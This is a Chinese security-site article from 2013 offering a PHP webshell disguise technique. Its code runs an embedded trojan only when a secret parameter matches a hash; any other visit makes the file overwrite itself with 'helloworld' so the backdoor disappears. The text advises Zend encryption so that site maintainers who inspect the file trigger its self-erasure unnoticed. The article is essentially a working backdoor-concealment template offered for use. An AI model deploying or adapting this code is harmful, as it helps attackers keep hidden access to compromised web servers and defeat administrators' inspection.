热门关键字:   网站安全  黑客攻防  安全漏洞  系统安全  网络安全
站外
广告
域名申请虚拟主机 信息安全 域名注册 云主机 网络安全技术 企业网络安全 站外
广告
文字广告位招租 文字广告位招租 文字广告位招租 文字广告位招租 云安全

实现另类的脚本木马伪装思路

发布时间:2013-12-16 11:08文章来源:网络文章作者:juuxdd 点击次数:
摘要:? if ( $_REQUEST [ oo000 ]==c47d187067c6cf953245f128b5fde62a){ 一句话,或者木马代码! } else { $url = $_SERVER [ 'PHP_SELF' ]; $filename = end ( explode ( '/' , $url )); $content = 'helloworld' ; $fp = fopen ( $filename , w ); if (fwrite(...

 

  1. <? 
  2. if($_REQUEST["oo000"]==c47d187067c6cf953245f128b5fde62a){ 
  3. 一句话,或者木马代码! 
  4. else
  5. $url = $_SERVER['PHP_SELF']; 
  6. $filename = end(explode('/',$url)); 
  7.  
  8. $content = 'helloworld'
  9. $fp = fopen ("$filename","w"); 
  10. if (fwrite ($fp$content)){ 
  11. fclose ($fp); 
  12. die ("error"); 
  13. else { 
  14. fclose ($fp); 
  15. die ("good"); 
  16. exit
  17. ?> 

用zend吧代码加密起来,

一般情况下,遇到陌生的php都会打开看看,一看是zend就会在浏览器访问下,这样的话,直接往当前文件写入一个正常的文字

不会被维护人员发觉!!被发现自动消失!

自己访问的时候?oo000=***这样,访问的方式不对,也会写入正常文字,

标签分类:

上一篇:安全狗拦截webshell在某些条件下存在绕过
下一篇:齐博cms最新后台getshell